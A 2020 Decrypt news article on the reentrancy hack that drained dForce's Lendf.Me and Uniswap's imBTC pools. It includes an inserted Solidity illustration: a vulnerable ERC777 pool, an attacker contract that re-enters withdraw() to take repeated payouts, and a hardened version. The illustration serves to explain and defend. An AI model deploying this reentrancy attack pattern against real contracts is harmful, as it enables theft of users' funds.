
Hackers just exploited a DeFi contract for $25 million

decrypt.co, 19 April 2020 08:23 UTC

dForce, a Chinese decentralized finance protocol, today lost $25 million worth of its customers’ cryptocurrency due to a well-known exploit of an Ethereum token. 

On Tuesday, dForce announced that it had secured $1.5 million in a seed round led by crypto VC fund Multicoin Capital.

The money was drained this morning from the contracts of Lendf.Me, a lending protocol that’s part of dForce, a collection of DeFi protocols. The site for Lendf.Me is now offline and its smart contracts have been paused. The funds were sent to DeFi lending protocols Compound and Aave. Stani Kulechov, founder and CEO of Aave, told Decrypt that around $10 million of the funds were sent to his protocol. 

The hack is linked to a well-known Ethereum exploit that was yesterday used to drain more than $300,000 from decentralized exchange Uniswap. Uniswap smart contracts containing imBTC—an Ethereum-based, tokenized version of Bitcoin that's run by Tokenlon—were drained. Lendf.Me integrated imBTC in January. 

The smart contract for dForce was drained. (Source: DeFiPulse)

The Uniswap attack took advantage of a known weakness in how the exchange's contracts handled tokens that follow the ERC777 standard. Unlike ERC20, an ERC777 transfer calls a hook on the receiving (or sending) contract in the middle of the transfer. Because Uniswap's contracts paid out before updating their own balances, an attacker's hook could re-enter the exchange and withdraw imBTC again against the same, still-unreduced balance, gradually draining the contracts. The dForce hack is suspected to be the same. 
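The pattern described above, as an added Solidity illustration written for this page (it is not Uniswap's, Lendf.Me's or Compound's code): a simplified pool whose withdraw() transfers an ERC777 token before it writes the updated balance, an attacker contract whose tokensReceived hook re-enters that function, and a hardened version of the pool. The contract and function names are invented; the ERC1820 registry address is the canonical deployment that ERC777 tokens consult for hooks.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Canonical ERC1820 registry; ERC777 tokens look up hook implementers here
// before every transfer.
address constant ERC1820_REGISTRY = 0x1820a4B7618BdE71Dce8cdd73aAB6c95905faD24;
bytes32 constant TOKENS_RECIPIENT = keccak256("ERC777TokensRecipient");

interface IERC1820Registry {
    function setInterfaceImplementer(address account, bytes32 interfaceHash, address implementer) external;
}
interface IERC777 {
    function send(address to, uint256 amount, bytes calldata data) external;
    function operatorSend(address from, address to, uint256 amount, bytes calldata data, bytes calldata operatorData) external;
}
interface IERC777Recipient {
    function tokensReceived(address operator, address from, address to, uint256 amount, bytes calldata userData, bytes calldata operatorData) external;
}

// ERC777 refuses to send tokens to a contract that has not registered a
// recipient implementer, so every contract below registers itself.
abstract contract ERC777Receiver is IERC777Recipient {
    constructor() {
        IERC1820Registry(ERC1820_REGISTRY).setInterfaceImplementer(address(this), TOKENS_RECIPIENT, address(this));
    }
}

// VULNERABLE (hypothetical): reads the balance, makes the external transfer,
// then writes back a value computed before the call.
contract VulnerablePool is ERC777Receiver {
    IERC777 public immutable token;
    mapping(address => uint256) public balances;
    constructor(IERC777 _token) { token = _token; }

    // Depositor must first call token.authorizeOperator(<this pool>).
    function deposit(uint256 amount) external {
        token.operatorSend(msg.sender, address(this), amount, "", "");
        balances[msg.sender] += amount;
    }

    function withdraw(uint256 amount) external {
        uint256 bal = balances[msg.sender];
        require(bal >= amount, "insufficient");
        // send() runs msg.sender's tokensReceived hook; a hook that calls
        // withdraw() again still sees the unreduced balance.
        token.send(msg.sender, amount, "");
        balances[msg.sender] = bal - amount; // stale write clobbers the inner calls' updates
    }
    function tokensReceived(address, address, address, uint256, bytes calldata, bytes calldata) external override {}
}

// Attacker (hypothetical): its hook re-enters withdraw() while its pool balance
// is stale. After authorizeOperator and deposit(x) from this contract (setup
// omitted), attack(x) receives x * (MAX_REENTRIES + 1) tokens and leaves the
// recorded balance at 0.
contract Attacker is ERC777Receiver {
    VulnerablePool public immutable pool;
    uint256 public constant MAX_REENTRIES = 10;
    uint256 public reentries;
    constructor(VulnerablePool _pool) { pool = _pool; }

    function attack(uint256 amount) external { pool.withdraw(amount); }

    function tokensReceived(address, address from, address, uint256 amount, bytes calldata, bytes calldata) external override {
        if (from == address(pool) && reentries < MAX_REENTRIES) {
            reentries++;
            pool.withdraw(amount); // re-enter before the outer call updates storage
        }
    }
}

// HARDENED: checks-effects-interactions plus a reentrancy guard, so a hook
// firing inside deposit() or withdraw() cannot re-enter either function.
contract HardenedPool is ERC777Receiver {
    IERC777 public immutable token;
    mapping(address => uint256) public balances;
    bool private locked;
    modifier nonReentrant() { require(!locked, "reentrant call"); locked = true; _; locked = false; }
    constructor(IERC777 _token) { token = _token; }

    function deposit(uint256 amount) external nonReentrant {
        token.operatorSend(msg.sender, address(this), amount, "", "");
        balances[msg.sender] += amount;
    }

    function withdraw(uint256 amount) external nonReentrant {
        require(balances[msg.sender] >= amount, "insufficient");
        balances[msg.sender] -= amount;     // effect first
        token.send(msg.sender, amount, ""); // external call last
    }
    function tokensReceived(address, address, address, uint256, bytes calldata, bytes calldata) external override {}
}
```

The vulnerable pool is safe with a plain ERC20 token, which has no transfer hooks and so gives the caller no chance to re-enter; the hole opens only when an ERC777 token is added to a contract written under ERC20 assumptions. The guard in the hardened version matters as much as the reordering, because the tokensToSend hook fired during deposit() can re-enter just as tokensReceived does during withdraw().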

Both Tokenlon and Lendf.Me temporarily paused their smart contracts following the attacks. “We are working together with [Lendf.Me] to investigate it,” tweeted Tokenlon. A spokesperson for dForce told Decrypt that they, too, are “still investigating.”

The vulnerability is not new. As described by DeFi Rate, the exploit is similar to the 2016 attack on The DAO. And ConsenSys, which backs an editorially independent Decrypt, called out the vulnerability in an extensive audit on Uniswap 16 months ago, concluding that it was a “major” issue. Uniswap will fix the vulnerability in an upgrade scheduled for this month.

Robert Leshner, the CEO of Compound, claims that Lendf.Me had appropriated its code, which was open-source. A report from The Block in January found that the term “Compound” appeared four times in dForce's contract. “If a project doesn't have the expertise to develop its own smart contracts, and instead steals and redeploys somebody else's copyrighted code, it's a sign that they don't have the capacity or intention to consider security,” tweeted Leshner.

4. Trusting platforms with obvious red flags like code appropriation is a bad bad idea.

— kain.eth (@kaiynne) April 19, 2020

So far, dForce has not discussed the exploit on their social media channels, “which is really frustrating,” one user, David Liu, who claims he lost $100,000, told Decrypt. dForce has not responded to further questions. 

Following February’s exploits on bZx, in which $1 million was stolen, investors might think twice before surrendering their money to smart contracts. For now, much of the money rests in Aave. Returning the money to its rightful owners is “difficult,” Kulechov said, “because we are DeFi.”
